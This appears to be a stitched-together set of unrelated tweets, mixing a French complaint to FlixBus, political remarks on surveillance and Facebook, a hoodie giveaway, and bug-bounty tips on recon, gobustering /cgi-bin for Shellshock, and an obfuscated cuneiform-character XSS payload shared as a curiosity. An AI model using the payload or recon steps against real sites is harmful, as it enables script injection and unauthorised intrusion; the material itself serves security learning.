@FlixBus_FR Vos agents de support qui mentent ouvertement pour ne pas rembourser des clients on en parle ? Vous allez faire quelque chose pour mon remboursement ?
So many beginners ask what to do after finding subdomains 🧵
1. Do directory search
2. Do Github dork
3. Do google dork
4. FUZZ for params
5. FUZZ for vhosts
6. Find Wayback data (gau, waybackurl)
7. Find javascript files
1/n
Another long (hacker) story thread 🧵
= Stealing checks worth millions & pwning a bank =
Here’s how I did it, so you can learn.
I was once contracted to do a penetration test on a bank…
Like, retweet, and follow for more hacker stories!
(1/x)
Quand même drôle toutes ces personnes manifestant ce weekend contre "la surveillance généralisée"...
Bizarrement, on ne les a jamais vu dans nos manifestations contre la Loi Renseignement et son extension récente, contre la surveillance de masse et contre la LOPPSI à son époque.
We are super excited to have reached 10,000 followers and to celebrate, we're giving away 10 custom SSD hoodies that will get you through winter in style! 🥳
To enter just retweet and leave a comment on this post.
If you see a /cgi-bin directory on a webserver, don't forget to gobuster inside that directory looking for extensions like .sh, .cgi, (and even .py, .pl, or more).... you might be able to find a Shellshock vulnerability. That bug is... still around...
Facebook officially silences the President of the United States. For better or worse, this will be remembered as a turning point in the battle for control over digital speech.
an XSS payload, Cuneiform-alphabet based
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
#bugbounty#bugbountytips#cybersecurity